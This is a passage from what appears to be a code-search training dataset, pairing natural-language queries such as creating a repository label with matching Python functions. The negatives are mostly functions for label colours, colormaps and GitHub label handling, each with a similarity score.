'maroon'\n pretty_colours['atm_muon_scale'] = 'goldenrod'\n pretty_colours['deltam31'] = 'blueviolet'\n pretty_colours['theta23'] = 'forestgreen'\n pretty_colours['hole_ice_fwd'] = 'mediumvioletred'\n pretty_colours['dom_eff'] = 'cornflowerblue'\n pretty_colours['genie_ma_qe'] = 'mediumseagreen'\n pretty_colours['genie_ma_res'] = 'olive'\n pretty_colours['hole_ice'] = 'darkorange'\n pretty_colours['nue_numu_ratio'] = 'teal'\n pretty_colours['theta13'] = 'fuchsia'\n pretty_colours['barr_nu_nubar'] = 'thistle'\n pretty_colours['barr_uphor'] = 'orchid'\n pretty_colours['delta_index'] = 'navy'\n # Mass ordering\n pretty_colours['no'] = 'r'\n pretty_colours['io'] = 'b'\n # Asimov fits\n pretty_colours['th_to_wh'] = 'darkviolet'\n pretty_colours['wh_to_th'] = 'deepskyblue'\n colourlabel = None\n for colourkey in pretty_colours.keys():\n if (colourkey in label) or (colourkey == label):\n colourlabel = pretty_colours[colourkey]\n if colourlabel is None:\n logging.debug(\"I do not have a colour scheme for your label %s. 
\"\n \"Returning black.\"%label)\n colourlabel = 'k'\n return colourlabel", "def get_value( self, trans, grid, repository ):\n repo = hg_util.get_repo_for_repository( trans.app, repository=repository, repo_path=None, create=False )\n heads = hg_util.get_repository_heads( repo )\n multiple_heads = len( heads ) > 1\n if multiple_heads:\n heads_str = '<font color=\"red\">'\n else:\n heads_str = ''\n for ctx in heads:\n heads_str += '%s<br/>' % hg_util.get_revision_label_from_ctx( ctx, include_date=True )\n heads_str.rstrip( '<br/>' )\n if multiple_heads:\n heads_str += '</font>'\n return heads_str", "def _build_label(self):\n counter = Counter()\n _, labels = self.read_json()\n counter.update(labels)\n dictionary = dict()\n for i, word in enumerate(counter.most_common()):\n dictionary[word[0]] = i\n return dictionary", "def color(self, label):\n if self.grayscale:\n return (\"#ffffff\", \"#555555\", \"#888888\", \"#bbbbbb\", \"#222222\")[label]\n # COC WL WR SL SR\n return (\"#4e73b0\", \"#fdb863\", \"#b2abd2\", \"#e66101\", \"#5e3c99\")[label]", "def create_label_colormap():\n colormap = np.array([\n [128, 64, 128],\n [244, 35, 232],\n [ 70, 70, 70],\n [102, 102, 156],\n [190, 153, 153],\n [153, 153, 153],\n [250, 170, 30],\n [220, 220, 0],\n [107, 142, 35],\n [152, 251, 152],\n [ 70, 130, 180],\n [220, 20, 60],\n [255, 0, 0],\n [ 0, 0, 142],\n [ 0, 0, 70],\n [ 0, 60, 100],\n [ 0, 80, 100],\n [ 0, 0, 230],\n [119, 11, 32],\n [ 0, 0, 0]], dtype=np.uint8)\n return colormap", "def color_label_generator(clusters):\n colors = ['green', 'red', 'blue']\n point_colors = [\"\" for i in range(12)]\n for i, cluster in enumerate(clusters):\n for point_num in cluster:\n point_colors[point_num] = colors[i]\n return point_colors", "def for_status(status):\n colors_map = {\n # ERRORS\n # 1 == red\n \"CREATE_FAILED\": crayons.red,\n \"DELETE_FAILED\": crayons.red,\n \"UPDATE_FAILED\": crayons.red,\n \"ROLLBACK_IN_PROGRESS\": crayons.red,\n \"ROLLBACK_FAILED\": crayons.red,\n \"UPDATE_ROLLBACK_FAILED\": crayons.red,\n # COMPLETE\n # 2 == green\n \"ROLLBACK_COMPLETE\": crayons.green,\n \"CREATE_COMPLETE\": crayons.green,\n \"DELETE_COMPLETE\": crayons.green,\n \"UPDATE_COMPLETE\": crayons.green,\n \"UPDATE_ROLLBACK_COMPLETE\": crayons.green,\n # SUCCESS\n # 3 == yellow\n \"CREATE_IN_PROGRESS\": crayons.yellow,\n \"DELETE_IN_PROGRESS\": crayons.yellow,\n \"UPDATE_IN_PROGRESS\": crayons.yellow,\n \"UPDATE_ROLLBACK_IN_PROGRESS\": crayons.yellow,\n \"UPDATE_COMPLETE_CLEANUP_IN_PROGRESS\": crayons.yellow,\n \"UPDATE_ROLLBACK_COMPLETE_CLEANUP_IN_PROGRESS\": crayons.yellow,\n # SKIPPED\n # 8 == grey\n \"DELETE_SKIPPED\": crayons.cyan,\n }\n return \"{}\".format(colors_map[status](status))", "def get_label_color_mapping(idx):\n # https://gist.github.com/wllhf/a4533e0adebe57e3ed06d4b50c8419ae\n def bitget(byteval, ch):\n return (byteval & (1 << ch)) != 0\n r = g = b = 0\n for j in range(8):\n r = r | (bitget(idx, 0) << 7 - j)\n g = g | (bitget(idx, 1) << 7 - j)\n b = b | (bitget(idx, 2) << 7 - j)\n idx = idx >> 3\n return np.array([r, g, b], dtype=np.uint8)", "def get_label_dict(base):\n label_dict = copy.deepcopy(labelDict)\n symbol = None\n if base.rendererType == \"gdb\":\n symbol = LabelRenderer.get_gdb_symbol(base.arcLayer)\n annotation_class_id = LabelRenderer.get_annotation_class_id(base.arcLayer)\n\n label_dict['labelValues']['type'] = 'rule-based'\n label_dict['labelValues']['classId'] = str(annotation_class_id)\n label_dict['labelValues']['text-style']['fieldName'] = 'TextString'\n elif base.rendererType == 
\"feature\":\n symbol = LabelRenderer.specify_feature_content(base.arcLayer, label_dict)\n\n formatted_symbol = change_interface(symbol, ArcGisModules.module_display.IFormattedTextSymbol)\n\n LabelRenderer.get_text_style(formatted_symbol, label_dict)\n LabelRenderer.get_background(formatted_symbol, label_dict)\n\n return label_dict", "def get_colors(self):\n colors = [\"#244486\", \"#A6A6A6\", \"#B12122\"]\n cmap = LinearSegmentedColormap.from_list(\"mycmap\", colors)\n\n color_palette=[cmap(i) for i in np.linspace(0, 1, len(set(self.nodes_list)))]\n return dict(zip(list(set(self.nodes_list)), color_palette))", "def getColorDict():\n scribus.statusMessage(\"Reading existing colors...\")\n colornames = scribus.getColorNames()\n scribus.progressTotal(len(colornames))\n i=0\n colordict={}\n for name in colornames:\n colordict[name]=None\n i=i+1\n scribus.progressSet(i)\n return colordict #we can ask this dict if the color already exists", "def XCAFDoc_DocumentTool_ColorsLabel(*args):\n return _XCAFDoc.XCAFDoc_DocumentTool_ColorsLabel(*args)", "def pull_labels(self, org):\n pass", "def label_rgb(colors):\n return ('rgb(%s, %s, %s)' % (colors[0], colors[1], colors[2]))", "def get_label(settings):", "def json_to_labels(data):\n labels = []\n for item in data:\n labels.append(Label(item['title'], item['color'], item['desc']))\n return labels", "def get_label(repo, title, verbose=None):\n if verbose:\n print \"Checking for label...\"\n label = None\n label_text = None\n try:\n label_start = 1 + title.index('(')\n label_end = title.index(')')\n label_text = title[label_start:label_end]\n except ValueError, e:\n print \"Warning: This tile has no embeded label. {0}\".format(e)\n if label_text:\n try:\n label = [repo.get_label(label_text)]\n if verbose:\n print \"Found label: {0}\".format(label)\n except UnknownObjectException, e:\n print \"Error: The label '{0}' does not exist on \" \\\n \"Github. 
{1}\".format(label_text, e)\n return label", "def prepare_label_cache(corpus):\n cache = {'Tense:{}'.format(t.pk): (t.title, t.category.color, t.category.title)\n for t in Tense.objects.select_related('category')}\n for i, label in enumerate(Label.objects.filter(key__corpora=corpus)):\n color = label.color if label.color is not None else COLOR_LIST[i % len(COLOR_LIST)]\n cache['Label:{}'.format(label.pk)] = label.title, color, None\n return cache", "def get_color(self, node: Node) -> str:\n\n idx = hash(node.get_kind_name()) % len(self.colors_)\n return self.colors_[idx]", "def get_project_labels(session=konfuzio_session()) -> List[dict]:\n url = get_project_url()\n r = retry_get(session, url)\n sorted_labels = sorted(r.json()['labels'], key=itemgetter('id'))\n return sorted_labels", "def get_labels(rf_pipeline):\n return rf_pipeline.stages[0].labels", "def get_segment_colour_map(self, features):\n\n hashList = {'1' : 'Grey',\n '2':'Red',\n '3':'Green',\n '4':'greenyellow',\n '5':'Pink',\n '6':'Orange',\n '7':'goldenrod',\n '8':'indianred',\n '9':'peachpuff',\n '10':'deepskyblue',\n '11':'firebrick',\n '12':'orchid',\n '13': 'moccasin',\n '14':'slateblue',\n '15':'turquoise',\n '16':'tomato',\n '17':'darkmagenta',\n '18':'olivedrab'}\n return hashList", "def get_pattern_labels(self, pipeline: str) -> Set[str]:", "def label_color(label):\n if label < len(colors):\n return colors[label]\n else:\n warnings.warn('Label {} has no color, returning default.'.format(label))\n return (0, 255, 0)", "def get_label_properties(identifier, seq=0, allow_empty=False):\n if not identifier:\n label = '-'\n color = '#000000'\n category = None\n elif isinstance(identifier, numbers.Number):\n tense = Tense.objects.select_related('category').get(pk=identifier)\n label = tense.title\n color = tense.category.color\n category = tense.category.title\n else:\n label = identifier\n color = '#000000' if allow_empty else get_color(identifier, seq)\n category = None\n return label, color, category", "def unique_legend_labels(key, token, board_id):\n colors = ['green', 'orange', 'purple', 'blue', 'lime', 'pink', 'sky', 'black']\n legend_id = my_get_lists(board_id, key, token)['Legend']\n members = my_get_cards(legend_id, key, token)\n members_names = list(members.keys())\n\n for i in range(len(members_names)):\n if i < len(colors):\n j = i\n add_label_to_card(key, token, members[members_names[i]], colors[j], name=members_names[i])\n elif i >= len(colors):\n j = i - len(colors)\n add_label_to_card(key, token, members[members_names[i]], colors[j], name=members_names[i])", "def _get_label_colors(n_labels, label_colors=None):\n\n if label_colors is not None:\n if len(label_colors) != n_labels:\n raise ValueError(\"There must be a color in label_colors \"\n \"for each of the labels that appear in \"\n \"sample_labels.\")\n else:\n colormap = matplotlib.cm.get_cmap()\n label_colors = colormap(np.arange(n_labels) / (n_labels - 1))\n\n return label_colors", "def colour_connected_components(labels):\n\n # Finds the HSV values based on the label number\n label_hue = np.uint8(179 * labels / np.max(labels))\n blank_ch = 255 * np.ones_like(label_hue)\n labeled_img = cv2.merge([label_hue, blank_ch, blank_ch])\n\n # Convert to BGR for display\n labeled_img = cv2.cvtColor(labeled_img, cv2.COLOR_HSV2BGR)\n\n # Set the background labels to black\n labeled_img[label_hue == 0] = 0\n\n return labeled_img", "def get_labels(self):\n labels = {}\n for i in self.binaries:\n labels[i] = self.binaries[i].label\n return labels", "def 
colors(self):\n return self[\"colors\"]", "def colors(self):\n return self[\"colors\"]", "def get_label_html_color_code(idx):\n color_array = get_label_color_mapping(idx)\n return f\"#{color_array[0]:02X}{color_array[1]:02X}{color_array[2]:02X}\"", "def canonical_coloring_label_1(G,c):\n \n H = G.copy()\n #H.allow_loops( true )\n\n for i in c:\n print( i )\n H.add_edges([(i,j) for j in c[i]])\n\n P = [G.vertices(), c.keys()]\n return H.canonical_label(partition=P)", "def parse_colors():\n var = os.environ.get('LS_COLORS', '')\n items = var.split(':')\n ext_map = {}\n special_map = {}\n for item in items:\n try:\n pattern, val = item.split('=')\n except ValueError:\n # TODO\n continue\n pattern = pattern.lower()\n\n if pattern.startswith('*'):\n ext_map[pattern[1:]] = val\n else:\n special_map[pattern] = val\n logger.debug(''.join(list('%s %s\\n' % (k, v) for k, v in ext_map.items())))\n return ext_map, special_map", "def get_labels(labels_name):\n labels = {\n \"labels_num\":['Blogs - Change', 'Customer Activity - Change', 'Days Since Last Login - Change', \n 'Happiness Index - Change', 'Happiness Index - Current Month', 'Happiness Index - Monthly', \n 'Logins - Change', 'Longevity - Modulo 12', 'Longevity - Modulo 18', 'Longevity - Modulo 24', \n 'Longevity - Months', 'Views - Change'],\n \"labels_cat\":['Longevity - Modulo 6', 'Support Cases - Change', 'Support Cases - Current Month', 'Support Priority - Change',\n 'Support Priority - Current Month'],\n \"target\":\"Churn\",\n \"labels_pca\":['Happiness Index - Monthly', 'Longevity - Modulo 12', 'Happiness Index - Change', \n 'Blogs - Change', 'Happiness Index - Current Month', 'Longevity - Modulo 24', \n 'Customer Activity - Change', 'Logins - Change', 'Longevity - Modulo 18', \n 'Days Since Last Login - Change']\n }\n return labels[labels_name]", "def getLabels(kmeans, options):\n colors = []\n unics=[]\n for i, c in enumerate(kmeans.centroids):\n sc=np.flip(np.argsort(c))\n color=\"\"\n if c[sc[0]]>options['single_thr']:\n color=cn.colors[sc[0]]\n else:\n colorSort=sorted([cn.colors[sc[0]], cn.colors[sc[1]]])\n color=colorSort[0]+colorSort[1]\n if color in colors:\n unics[colors.index(color)].append(i)\n else:\n colors.append(color)\n unics.append([i])\n\n return colors, unics", "def decode_segmap(label_mask, n_classes, hex_color_dict, dataset, plot=False):\r\n\r\n r = label_mask.copy()\r\n g = label_mask.copy()\r\n b = label_mask.copy()\r\n for ll in range(0, n_classes):\r\n r[label_mask == ll] = Hex_to_RGB(hex_color_dict[ll])[0]\r\n g[label_mask == ll] = Hex_to_RGB(hex_color_dict[ll])[1]\r\n b[label_mask == ll] = Hex_to_RGB(hex_color_dict[ll])[2]\r\n rgb = np.zeros((label_mask.shape[0], label_mask.shape[1], 3))\r\n rgb[:, :, 0] = r / 255.0\r\n rgb[:, :, 1] = g / 255.0\r\n rgb[:, :, 2] = b / 255.0\r\n\r\n return rgb", "def labels_to_cityscapes_palette(image):\n classes=ZHANG_classes \n result =np.zeros((img.shape[0], img.shape[1], 3),dtype=np.uint8)\n for key, value in classes.items():\n result[np.where(img == key)] = value\n return result", "def create_cityscapes_label_colormap():\r\n colormap = np.zeros((256, 3), dtype=np.uint8)\r\n colormap[0] = [128, 64, 128]\r\n colormap[1] = [244, 35, 232]\r\n colormap[2] = [70, 70, 70]\r\n colormap[3] = [102, 102, 156]\r\n colormap[4] = [190, 153, 153]\r\n colormap[5] = [153, 153, 153]\r\n colormap[6] = [250, 170, 30]\r\n colormap[7] = [220, 220, 0]\r\n colormap[8] = [107, 142, 35]\r\n colormap[9] = [152, 251, 152]\r\n colormap[10] = [70, 130, 180]\r\n colormap[11] = [220, 20, 60]\r\n 
colormap[12] = [255, 0, 0]\r\n colormap[13] = [0, 0, 142]\r\n colormap[14] = [0, 0, 70]\r\n colormap[15] = [0, 60, 100]\r\n colormap[16] = [0, 80, 100]\r\n colormap[17] = [0, 0, 230]\r\n colormap[18] = [119, 11, 32]\r\n return colormap", "def colors(self):\n unique, counts = np.unique(self.arr, return_counts=True)\n return {k: v for (k, v) in zip(unique, counts)}", "def labels_list(issue):\n return [x['name'] for x in issue['labels']]", "def get_labels():\n return if_found(dao.get_labels())", "def _color_for_labels(label_color, default_color, seq_index):\n if label_color is None:\n if hasattr(default_color, '__getitem__'):\n c = default_color[seq_index]\n else:\n c = default_color\n else:\n c = label_color\n\n return c or 'black'", "def get_highlighted_style(feature):\r\n\r\n return {\"weight\": 3, \"color\": \"black\"}", "def get_colors_st(top_cities_reviews):\n unique_states = top_cities_reviews['state'].unique()\n\n st = {}\n for state in unique_states:\n r = random.uniform(0, 1)\n g = random.uniform(0, 1)\n b = random.uniform(0, 1)\n st[state] = [r, g, b]\n\n return st", "def colors(lang=\"en\"):\n cache_name = \"colors.%s.json\" % lang\n data = get_cached(\"colors.json\", cache_name, params=dict(lang=lang))\n return data[\"colors\"]", "def get_labels(self):\n return set(category.label for category in\n self.get_categories(LABELS_SCHEME))", "def test_get_container_colors(self):\n colorless_containers = []\n for c in test_ps_data.ps_containers:\n c.pop('color')\n colorless_containers.append(c)\n\n color_containers = dockerprettyps.get_container_colors(colorless_containers)\n for c in color_containers:\n assert 'color' in c\n assert isinstance(c['color'], str)", "def getColor(k) :\n colors = [\"#862B59\",\"#A10000\",\"#0A6308\",\"#123677\",\"#ff8100\",\"#F28686\",\"#6adf4f\",\"#58ccdd\",\"#3a3536\",\"#00ab7c\"]\n return colors[k]", "def _labels_pcolor(self, obj, fmt=None, **kwargs):\n # Parse input args and populate _facecolors, which is initially unfilled\n # See: https://stackoverflow.com/a/20998634/4970632\n fmt = _not_none(fmt, pticker.SimpleFormatter())\n labels_kw = {'size': rc['text.labelsize'], 'ha': 'center', 'va': 'center'}\n labels_kw.update(kwargs)\n obj.update_scalarmappable() # populate _facecolors\n\n # Get positions and contour colors\n array = obj.get_array()\n paths = obj.get_paths()\n colors = _to_ndarray(obj.get_facecolors())\n edgecolors = _to_ndarray(obj.get_edgecolors())\n if len(colors) == 1: # weird flex but okay\n colors = np.repeat(colors, len(array), axis=0)\n if len(edgecolors) == 1:\n edgecolors = np.repeat(edgecolors, len(array), axis=0)\n\n # Apply colors\n labs = []\n for i, (color, path, num) in enumerate(zip(colors, paths, array)):\n if not np.isfinite(num):\n edgecolors[i, :] = 0\n continue\n bbox = path.get_extents()\n x = (bbox.xmin + bbox.xmax) / 2\n y = (bbox.ymin + bbox.ymax) / 2\n if 'color' not in kwargs:\n _, _, lum = to_xyz(color, 'hcl')\n if lum < 50:\n color = 'w'\n else:\n color = 'k'\n labels_kw['color'] = color\n lab = self.text(x, y, fmt(num), **labels_kw)\n labs.append(lab)\n obj.set_edgecolors(edgecolors)\n\n return labs", "def get_labels(self) -> Set[str]:", "def assign_colors(data: List[EmissionPerCapita]) -> dict:\r\n colors = {}\r\n for emission in data:\r\n r = random.randint(1, 255)\r\n g = random.randint(1, 255)\r\n b = random.randint(1, 255)\r\n color = \"rgb(\" + str(r) + \",\" + str(g) + \",\" + str(b) + \")\"\r\n dict.update(colors, {emission.name: color})\r\n\r\n return colors", "def preset_colors( self, labels ):\n 
size_labels = len( labels )\n self.color_override = self.metadata.get('color_override', {})\n try:\n if self.color_override == {}:\n raise Exception('going to the default')\n colours = self.color_override\n size_colors = len ( colours )\n retval = []\n for label in labels:\n mycolour = colours[label]\n retval.append(mycolour)\n except:\n hex_colors = self.hex_colors\n size_colors = len( hex_colors )\n retval = [ hex_colors[ i % size_colors ] for i in range( size_labels ) ]\n\n retval.reverse()\n return retval", "def getPredefinedColors(self):\n colorNames = [ 'Comment', \\\n 'Constant', \\\n 'String', \\\n 'VariableName', \\\n 'FunctionName', \\\n 'Keyword', \\\n 'Type', \\\n 'None', \\\n 'Error' \\\n ]\n colors = {}\n for colorName in colorNames:\n colors[colorName]=Color(Token(None,None,colorName),True)\n return colors", "def _generate_pipeline_labels(self, job):\n jobname = self._get_jobname(job)\n labels = {\"name\": jobname, \"app\": \"snakemake\"}\n return labels", "def extract_labels(pdbbind_label_file):\n assert os.path.isfile(pdbbind_label_file)\n labels = {}\n with open(pdbbind_label_file) as f:\n content = f.readlines()\n for line in content:\n if line[0] == \"#\":\n continue\n line = line.split()\n # lines in the label file have format\n # PDB-code Resolution Release-Year -logKd Kd reference ligand-name\n #print line[0], line[3]\n labels[line[0]] = line[3]\n return labels", "def get_labels(self, uuid=None):\n return self._get_query('labels', self._build_params(uuid=uuid), Label)", "def test_issue_get_labels(self):\n pass", "def labels(self) -> dict:\n raise NotImplementedError", "def fetch_stanford_labels():\n dipy_home = pjoin(os.path.expanduser('~'), '.dipy')\n folder = pjoin(dipy_home, 'stanford_hardi')\n baseurl = 'https://stacks.stanford.edu/file/druid:yx282xq2090/'\n\n files = {}\n files[\"aparc-reduced.nii.gz\"] = (baseurl + \"aparc-reduced.nii.gz\",\n '742de90090d06e687ce486f680f6d71a')\n files[\"label-info.txt\"] = (baseurl + \"label_info.txt\",\n '39db9f0f5e173d7a2c2e51b07d5d711b')\n fetch_data(files, folder)\n return files, folder", "def color_label(color):\n\n key_colors = {**kelvin_temperature_colors, **background_colors, **strip_colors}\n nearest_color = lambda key_colors: color_distance(color, key_colors[1])\n\n label, key_color = min(key_colors.items(), key=nearest_color)\n is_backgound_color = label in background_colors or label in kelvin_temperature_colors\n return label, not is_backgound_color", "def get_predefined_labels(self):\n raise NotImplementedError", "def ActiveRelNames(promotion_label):\n names = {}\n for platform in platforms:\n names[platform] = active_releases[platform][promotion_label]\n return names", "def read_sublette():\n readme_path = os.path.join(os.path.dirname(__file__), '../README.md')\n with open(readme_path) as f:\n readme = f.read()\n\n markdown = Markdown(extensions=['markdown.extensions.tables'])\n html = lxml.html.parse(io.StringIO(markdown.convert(readme)))\n\n colors = {}\n for td_name in html.xpath('//table/tbody//td[1]'):\n td_color = td_name.getnext()\n\n name = td_name.text_content()\n color = td_color.text_content()\n\n colors[name] = color\n return colors", "def get_labels(info):\n return info.features[\"labels\"].names", "def get_labels(info):\n return info.features[\"labels\"].names", "def get_issue_labels(repo, project, issue_number):\n issue_path = '%s/%s/issues/%d' % (repo, project, issue_number)\n\n return jsonify(dao.get_issue_labels(issue_path))", "def labels(self) -> Mapping[str, str]:\n return pulumi.get(self, 
\"labels\")", "def labels(self) -> Mapping[str, str]:\n return pulumi.get(self, \"labels\")", "def labels(self) -> Mapping[str, str]:\n return pulumi.get(self, \"labels\")", "def labels(self) -> Mapping[str, str]:\n return pulumi.get(self, \"labels\")", "def labels(self) -> Mapping[str, str]:\n return pulumi.get(self, \"labels\")", "def labels(self) -> Mapping[str, str]:\n return pulumi.get(self, \"labels\")", "def labels(self) -> Mapping[str, str]:\n return pulumi.get(self, \"labels\")", "def labels(self) -> Mapping[str, str]:\n return pulumi.get(self, \"labels\")" ]
[ "0.65194696", "0.5914808", "0.5822218", "0.5784747", "0.57322896", "0.5691123", "0.5686196", "0.5633396", "0.56304544", "0.56205434", "0.55804044", "0.5575821", "0.5575821", "0.5575821", "0.5575821", "0.5560394", "0.55267113", "0.55267113", "0.5519801", "0.5494467", "0.54919934", "0.5491675", "0.5484689", "0.54767305", "0.5471285", "0.54246074", "0.54210824", "0.5395026", "0.53919697", "0.5371324", "0.5329346", "0.5317548", "0.53158563", "0.5312162", "0.5304034", "0.5266262", "0.52536964", "0.5253462", "0.52400786", "0.5233174", "0.5219748", "0.5214875", "0.52140665", "0.52049685", "0.5201082", "0.51904756", "0.5181766", "0.5180814", "0.517655", "0.51689047", "0.51660675", "0.5163932", "0.5162654", "0.5154053", "0.5145553", "0.5145553", "0.5144595", "0.5131606", "0.5130216", "0.5103735", "0.50992894", "0.50740486", "0.506931", "0.50689983", "0.50666976", "0.5058705", "0.5056072", "0.505046", "0.5043439", "0.50412863", "0.50278324", "0.5023185", "0.50230396", "0.50043184", "0.4998697", "0.4986827", "0.49671224", "0.4966867", "0.49650663", "0.4964892", "0.49634117", "0.49587148", "0.49454564", "0.49285397", "0.49262607", "0.492317", "0.49047276", "0.4903492", "0.490061", "0.48983166", "0.48983166", "0.48982647", "0.48944962", "0.48944962", "0.48944962", "0.48944962", "0.48944962", "0.48944962", "0.48944962", "0.48944962" ]
0.7589527
0
Create new label in given repository
def create_label(self, repository, name, color, **kwargs): data = {'name': name, 'color': color} response = self.session.post( '{}/repos/{}/labels'.format(self.GH_API_ENDPOINT, repository), json=data ) if response.status_code != 201: raise GitHubError(response)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_label(self, org, name):\n pass", "def test_issue_create_label(self):\n pass", "async def new_label(event, gh, *args, **kwargs):\n if event.data[\"label\"][\"name\"] == TRIVIAL_LABEL:\n issue_number_found = ISSUE_RE.search(\n event.data[\"pull_request\"][\"title\"])\n if issue_number_found:\n status = create_success_status(issue_number_found)\n else:\n status = TRIVIAL_STATUS\n await _post_status(event, gh, status)", "def set_labels(repo: Repository, labels: list[Label]):\n\n log.info(f\"Fetching existing labels from {repo.full_name}\")\n existing_labels = {label.name.casefold(): label for label in repo.get_labels()}\n log.info(f\"Found {len(existing_labels)} existing labels\")\n\n for label in labels:\n qualified_name = label.qualified_name\n folded_name = qualified_name.casefold()\n if folded_name not in existing_labels:\n log.info(f\"Creating label {qualified_name}\")\n repo.create_label(**label.api_arguments)\n elif label != existing_labels[folded_name]:\n log.info(f\"Updating label {qualified_name}\")\n existing_label = existing_labels[folded_name]\n existing_label.edit(**label.api_arguments)\n else:\n log.info(f\"Label {qualified_name} already exists\")", "def test_issue_add_label(self):\n pass", "def test_heads_create_new_branch_name(repository: Repository) -> None:\n branch = repository.heads.create(\"branch\", repository.head.commit)\n assert \"branch\" == branch.name", "def new_label(self, context, payload):\n\n labels = GmailActions.labels(context)['labels']\n label_id = \"\"\n\n for label in labels:\n if label['name'] == payload['name']:\n label_id = label['id']\n break\n\n access_token = util.get_access_token(context['headers'])\n url = util.get_url(context) + f\"labels/{label_id}\"\n response = util.rest(\"GET\", url, access_token)\n\n if response.status_code > 400:\n raise Exception(\"Error \", response.text)\n\n return json.loads(response.text)", "def label(self, name):\r\n return labels.RepoLabel(self, name)", "def create_label(self, name: str):\n return create_label(self.api_key, name)", "def add_label(self, new_name, status):\n api_uri = self._uri_dict.get('addLabel')\n data = {\n 'newName': new_name,\n 'status': status\n }\n r_data = self._post(api_uri, data)\n return r_data", "def create_label(**kwargs):\n Label = Entity.Label\n kwargs[Label.project] = project\n kwargs[Label.seconds_to_label] = kwargs.get(Label.seconds_to_label.name,\n 0.0)\n data = {\n Label.attribute(attr) if isinstance(attr, str) else attr:\n value.uid if isinstance(value, DbObject) else value\n for attr, value in kwargs.items()\n }\n query_str, params = query.create(Label, data)\n query_str = query_str.replace(\n \"data: {\", \"data: {type: {connect: {name: \\\"Any\\\"}} \")\n res = project.client.execute(query_str, params)\n return Label(project.client, res[\"createLabel\"])", "def add_labels(number, labels):\n\n cmds = [github_cli, 'pr', 'edit', str(number)]\n for lab in labels:\n cmds += ['--add-label', lab]\n\n with subprocess.Popen(cmds) as p:\n _, err = p.communicate()\n print(err)", "def _apply_label(self, label):\n data = {\n \"name\" : label.title,\n \"description\" : label.desc,\n \"color\" : label.color\n }\n resp = self._post(\n self._base + \"/labels\", data=self._format_data(data))", "def label_new(request):\n if request.method == 'POST':\n form = NewLabelForm(request.POST)\n\n if form.is_valid():\n label = form.save()\n messages.success(request, 'Label successfully created.')\n return HttpResponseRedirect(reverse('label_main', args=[label.id]))\n else:\n 
messages.error(request, 'Please correct the errors below.')\n else:\n form = NewLabelForm()\n\n return render_to_response('annotations/label_new.html', {\n 'form': form,\n },\n context_instance=RequestContext(request)\n )", "def create_label(project_id: int, label_name: str, templates: list, session=konfuzio_session(), **kwargs) -> List[dict]:\n url = get_create_label_url()\n templates_ids = [template.id for template in templates]\n\n description = kwargs.get('description', None)\n has_multiple_top_candidates = kwargs.get('has_multiple_top_candidates', False)\n data_type = kwargs.get('data_type', 'Text')\n\n data = {\"project\": project_id,\n \"text\": label_name,\n \"description\": description,\n \"has_multiple_top_candidates\": has_multiple_top_candidates,\n \"get_data_type_display\": data_type,\n \"templates\": templates_ids\n }\n\n r = session.post(url=url, json=data)\n\n assert r.status_code == requests.codes.created, f'Status of request: {r}'\n label_id = r.json()['id']\n return label_id", "def push_to_github(label):\n\n # Make sure we're in the right place to do all the git things.\n os.chdir(taas.data_root())\n\n # If there's nothing to do, then do nothing.\n if (not something_to_commit()):\n print(\"Nothing to commit.\")\n return\n\n branch_name = datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n\n branch_name += \"-\" + label\n\n run([\"git\", \"checkout\", \"-b\", branch_name])\n\n run([\"git\", \"add\", \"-A\"])\n\n run([\"git\", \"status\"])\n\n run([\"git\", \"commit\", \"-m\", \"Automated update: \"+label])\n\n run([\"git\", \"push\", \"--set-upstream\", \"origin\", branch_name])", "def test_0010_create_repository(self):\n category = self.create_category(name=category_name, description=category_description)\n self.login(email=common.test_user_1_email, username=common.test_user_1_name)\n self.get_or_create_repository(name=repository_name,\n description=repository_description,\n long_description=repository_long_description,\n owner=common.test_user_1_name,\n category_id=self.security.encode_id(category.id),\n strings_displayed=[])", "def put_labels():\n dao.delete_all_labels()\n for label in request.json:\n if 'id' not in label or not label['id']:\n label['id'] = str(uuid.uuid4())\n dao.set_label(id=label['id'],\n name=label['name'],\n fields=label['fields'])\n return if_found(dao.get_labels())", "def addLabel(*args):", "def createLabel(self, address: ghidra.program.model.address.Address, name: unicode, namespace: ghidra.program.model.symbol.Namespace, makePrimary: bool, sourceType: ghidra.program.model.symbol.SourceType) -> ghidra.program.model.symbol.Symbol:\n ...", "def __call__(self, *args, **kwargs) -> L:\n label = self._label_adapter.create_label(*args,\n document=self._document,\n **kwargs)\n self._current_labels.append(label)\n return label", "def command_new_repo(self):\n repoinit.new_repo(*self.args())", "def post_label():\n label_id = dao.set_label(id=str(uuid.uuid4()),\n name=request.json['name'],\n fields=request.json['fields'])\n\n return jsonify(dao.get_label(label_id))", "def update_label(self, repository, name, color, old_name=None, **kwargs):\n data = {'name': name, 'color': color}\n response = self.session.patch(\n '{}/repos/{}/labels/{}'.format(\n self.GH_API_ENDPOINT, repository, old_name or name\n ),\n json=data\n )\n if response.status_code != 200:\n raise GitHubError(response)", "def create_label(self, name):\n payload = self._build_params(name=name)\n return Label.deserialize(self._post('labels', None, payload))", "def _create_label(self, label: 
str, ent_id: Union[str, None]) -> str:\n if isinstance(ent_id, str):\n label = \"{}{}{}\".format(label, self.ent_id_sep, ent_id)\n return label", "def add_label(self, label):\n status = self.ocp.add_label(resource_name=self.name, label=label)\n self.reload()\n return status", "def insert_new_label(self, label, index, nvals):\n if label in self.labels: return\n self.labels.append(label)\n self.parents.append(self.find_parent_label(label))\n self.maxcounts[label] = nvals\n self.subjcounts[label] = 0", "def put_label(id):\n label_id = dao.set_label(id=id,\n name=request.json['name'],\n fields=request.json['fields'])\n\n return jsonify(dao.get_label(label_id))", "def test_create_metering_label(self):\r\n resource = 'metering_label'\r\n cmd = metering.CreateMeteringLabel(\r\n test_cli20.MyApp(sys.stdout), None)\r\n name = 'my label'\r\n myid = 'myid'\r\n description = 'my description'\r\n args = [name, '--description', description, '--shared']\r\n position_names = ['name', 'description', 'shared']\r\n position_values = [name, description, True]\r\n self._test_create_resource(resource, cmd, name, myid, args,\r\n position_names, position_values)", "def createLabel(self, address: ghidra.program.model.address.Address, name: unicode, makePrimary: bool, sourceType: ghidra.program.model.symbol.SourceType) -> ghidra.program.model.symbol.Symbol:\n ...", "def newrepo():\n form = AddRepoForm()\n if form.validate_on_submit():\n\n # make the directory for this package\n os.mkdir(DATA + form.name.data)\n\n flash('Repo created successfully')\n\n # redirect to the login page\n return redirect(url_for('home.dashboard'))\n\n # load registration template\n return render_template('home/add.html', form=form, title='Local Repo', target=\"add\")", "def gracedb_add_label(gracedb_id, label):\n\n # begin GraceDB API\n client = gracedb_rest.GraceDb()\n\n # append comment to GraceDB 